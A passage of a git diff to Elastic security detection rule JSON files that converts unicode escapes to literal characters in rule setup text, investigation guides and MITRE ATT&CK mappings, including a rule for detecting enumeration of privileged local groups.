8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json index 005ac8bcc31..1f7e96dcbb2 100644 --- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_104.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "2917d495-59bd-4250-b395-c29409b76086", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json index 55ece56de20..2f9c4075aeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_105.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "2917d495-59bd-4250-b395-c29409b76086", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json index 6e5a5d646aa..191d7e4df60 100644 --- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_106.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "2917d495-59bd-4250-b395-c29409b76086", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json index 03683f2b3ef..dbaebe4cf7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_107.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "2917d495-59bd-4250-b395-c29409b76086", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json index 69065c241e8..178d967fb4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2917d495-59bd-4250-b395-c29409b76086_108.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "2917d495-59bd-4250-b395-c29409b76086", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json index fbed07ea1e9..29dffcedfe0 100644 --- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "iam where host.os.type == \"windows\" and event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", "related_integrations": [ { @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", - "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json index 7c66a883eb3..e11d73176f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "iam where host.os.type == \"windows\" and event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n 